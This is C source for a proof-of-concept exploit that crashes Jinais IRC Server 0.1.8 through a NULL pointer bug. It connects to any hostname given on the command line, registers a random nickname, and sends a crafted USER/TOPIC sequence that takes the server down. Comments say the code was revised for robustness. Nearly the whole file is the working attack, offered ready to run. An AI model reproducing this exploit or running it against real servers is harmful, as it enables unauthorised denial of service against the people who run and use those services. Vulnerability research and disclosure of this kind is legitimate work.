/*
Jinais IRC Server 0.1.8 - NULL Pointer PoC

This PoC will disconnect the affected target IRC server using
a NULL Pointer vulnerability.

Copyright 2010 Salvatore Fresta aka Drosophila

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version
2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be
useful, but WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public
License along with this program; if not, write to the Free
Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
MA 02111-1307 USA

http://www.gnu.org/licenses/gpl-2.0.txt
*/
#include <errno.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
#include <winsock.h>
#define close closesocket
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#endif
/* Size of the outgoing message buffer and the TCP port used when none is
   given on the command line.  An enum keeps the constants typed, scoped and
   visible in a debugger, unlike #define. */
enum {
    BUFF_SIZE    = 256,
    DEFAULT_PORT = 4002
};

/* Thin wrappers around the BSD socket API.  Each returns -1 on failure;
   socket_receive() returns NULL on failure and otherwise a heap buffer that
   the caller must free(). */
int   socket_connect(char *server, int port);
char *socket_receive(int sock, int tout);
int   socket_send(int socket, char *buffer, size_t size);
int   socket_close(int socket);
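/*
 * Program entry point.
 *
 * argv[1] is the target hostname, argv[2] an optional TCP port (default
 * DEFAULT_PORT).  The client registers a random nickname, retrying while the
 * server answers "Nickname is already in use", then sends the USER/TOPIC
 * request that the affected server version mishandles and closes the socket.
 *
 * Returns 0 on success, -1 on a usage error or any I/O failure.  Compared with
 * the original: the port is validated instead of atoi()'d, the snprintf
 * truncation check uses >= (a result equal to the buffer size already means
 * truncation), the "%hu" / int mismatch in the banner is fixed, the nick retry
 * is bounded, and the final reply buffer is freed instead of leaked.
 */
int main(int argc, char *argv[]) {

    enum { MAX_NICK_RETRIES = 10 };
    int sd,
        rnd_num,
        len,
        retries = 0,
        port = DEFAULT_PORT;
    char pkg[BUFF_SIZE],
         *response = NULL,
         *host = NULL;

    if(argc < 2) {
        printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
               "\nhttp://www.salvatorefresta.net"
               "\n"
               "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
        return -1;
    }

    srand((unsigned) time(NULL));

    host = argv[1];

    /* strtol instead of atoi: a malformed or out-of-range port is rejected
       rather than silently turning into 0. */
    if(argc > 2) {
        char *end = NULL;
        errno = 0;
        long p = strtol(argv[2], &end, 10);
        if(end == argv[2] || *end != '\0' || errno == ERANGE || p < 1 || p > 65535) {
            printf("\n[-] Error: invalid port '%s'\n\n", argv[2]);
            return -1;
        }
        port = (int) p;
    }

    printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
           "\nhttp://www.salvatorefresta.net"
           "\n\n[*] Connecting to %s:%d...", host, port);

    sd = socket_connect(host, port);
    if(sd < 0) {
        printf("\n[-] Error on connect!\n\n");
        return -1;
    }

    printf("\n[+] Connection estabilished"
           "\n[*] Loggin to IRC server...");

    /* Nick registration: pick a random nick, resend while the server reports
       it as taken, give up after MAX_NICK_RETRIES instead of looping forever. */
    do {
        rnd_num = rand()%100+1;

        /* snprintf returns the length it *would* have written; a value equal
           to sizeof(pkg) means the message was already cut short. */
        len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
        if(len < 0 || (size_t) len >= sizeof(pkg)) {
            fprintf(stderr, "\n[-] Error: snprintf\n");   /* errno is meaningless here, so no perror */
            socket_close(sd);
            return -1;
        }

        if(socket_send(sd, pkg, (size_t) len) < 0) {
            perror("\n[-] Error: socket_send");
            socket_close(sd);
            return -1;
        }

        response = socket_receive(sd, 3);
        if(!response) {
            perror("\n[-] Error: socket_receive");
            socket_close(sd);
            return -1;
        }

        int in_use = strstr(response, "Nickname is already in use") != NULL;
        free(response);
        response = NULL;
        if(!in_use) break;
    } while(++retries < MAX_NICK_RETRIES);

    if(retries >= MAX_NICK_RETRIES) {
        printf("\n[-] Error: could not register a nickname after %d attempts\n\n", MAX_NICK_RETRIES);
        socket_close(sd);
        return -1;
    }

    printf("\n[+] Login successfully"
           "\n[*] Data sending...");

    rnd_num = rand()%100+1;
    len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
    if(len < 0 || (size_t) len >= sizeof(pkg)) {
        fprintf(stderr, "\n[-] Error: snprintf\n");
        socket_close(sd);
        return -1;
    }

    if(socket_send(sd, pkg, (size_t) len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }

    /* The reply is awaited but never inspected (as in the original); the
       buffer is released here instead of being leaked. */
    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }
    free(response);
    response = NULL;

    socket_close(sd);

    printf("\n[+] Data sent successfully"
           "\n[+] Connection closed\n\n");

    return 0;
}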
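/*
 * Resolve `server`, open a TCP socket and connect it to `port`.
 *
 * Returns the connected descriptor, or -1 on any failure.  Unlike the
 * original, the descriptor is closed again when connect() fails (name
 * resolution now happens before the socket is created), the port is
 * range-checked before it is narrowed to 16 bits, the resolved address is
 * copied with memcpy() instead of through a possibly misaligned cast, and
 * the non-portable h_addr macro is replaced by h_addr_list[0].
 * gethostbyname() is kept for compatibility with the rest of the file; it is
 * IPv4-only and not thread-safe.
 */
int socket_connect(char *server, int port) {

    int sd = -1;
    struct sockaddr_in sock;
    struct hostent *host = NULL;

    if(!server || port < 1 || port > 65535) return -1;

#ifdef WIN32
    WSADATA wsadata;
    if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
#endif

    /* Resolve first so a lookup failure leaves no descriptor open. */
    host = gethostbyname(server);
    if(!host || host->h_addrtype != AF_INET || !host->h_addr_list[0]
       || host->h_length != (int) sizeof(struct in_addr)) return -1;

    memset(&sock, 0, sizeof(sock));
    sock.sin_family = AF_INET;
    sock.sin_port = htons((unsigned short) port);
    memcpy(&sock.sin_addr, host->h_addr_list[0], sizeof(sock.sin_addr));

    if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

    if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) {
        close(sd);
        return -1;
    }

    return sd;
}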
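/*
 * Read everything the peer sends on `sock` until the connection is closed or
 * no further data arrives within `tout` seconds (`tout` <= 0 waits without a
 * timeout).  Note that `tout` is an idle timeout per read, not a bound on the
 * total time spent.
 *
 * Returns a heap-allocated, NUL-terminated copy of the received bytes, which
 * the caller must free(), or NULL if the descriptor is invalid, select() or
 * recv() fail, memory runs out, or nothing at all arrived before the timeout
 * (a data-less timeout is indistinguishable from an error for the caller).
 * Bytes equal to 0 in the stream are kept in the buffer but end strlen().
 *
 * Fixes relative to the original: the `buffer = realloc(buffer, ...)` pattern
 * leaked the old buffer on failure, the partial buffer was leaked on every
 * error return, and a descriptor >= FD_SETSIZE would make FD_SET() write past
 * the end of the fd_set.
 */
char *socket_receive(int sock, int tout) {

    int ret,
        byte_recv;
    size_t pkglen = 0;
    char *buffer = NULL,
         tmp[128];
    struct timeval timeout;
    fd_set input;

    if(sock < 0 || sock >= FD_SETSIZE) return NULL;

    while (1) {

        FD_ZERO(&input);
        FD_SET(sock, &input);

        if(tout > 0) {
            timeout.tv_sec = tout;
            timeout.tv_usec = 0;
            ret = select(sock + 1, &input, NULL, NULL, &timeout);
        }
        else
            ret = select(sock + 1, &input, NULL, NULL, NULL);

        if (!ret) break;                 /* idle timeout: return what was read so far */
        if (ret < 0) {
            free(buffer);
            return NULL;
        }

        byte_recv = recv(sock, tmp, sizeof(tmp), 0);

        if(byte_recv < 0) {
            free(buffer);
            return NULL;
        }

        if(!byte_recv) break;            /* peer closed the connection */

        /* Grow through a temporary so the old buffer survives a failed realloc(). */
        char *grown = realloc(buffer, pkglen + (size_t) byte_recv + 1);
        if(!grown) {
            free(buffer);
            return NULL;
        }
        buffer = grown;

        memcpy(buffer + pkglen, tmp, (size_t) byte_recv);
        pkglen += (size_t) byte_recv;
    }

    if(buffer) buffer[pkglen] = 0;

    return buffer;
}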
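/*
 * Send all `size` bytes of `buffer` on `socket`.
 *
 * send() may transmit fewer bytes than requested; the original reported such
 * a partial write as success.  This version loops until every byte is out.
 * Returns 0 on success, -1 if the descriptor is negative, `buffer` is NULL
 * with a non-zero size, or send() fails or makes no progress.
 */
int socket_send(int socket, char *buffer, size_t size) {

    size_t sent = 0;

    if(socket < 0) return -1;
    if(size > 0 && !buffer) return -1;

    while(sent < size) {
        long n = send(socket, buffer + sent, size - sent, 0);
        if(n <= 0) return -1;        /* error, or zero progress: do not spin */
        sent += (size_t) n;
    }

    return 0;
}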
/*
 * Close a socket descriptor.
 *
 * Returns 0 when close() (closesocket() on WIN32) succeeds, -1 when the
 * descriptor is negative or the call fails.
 */
int socket_close(int socket) {

    int rc = -1;

    if(socket >= 0 && close(socket) == 0) rc = 0;

    return rc;
}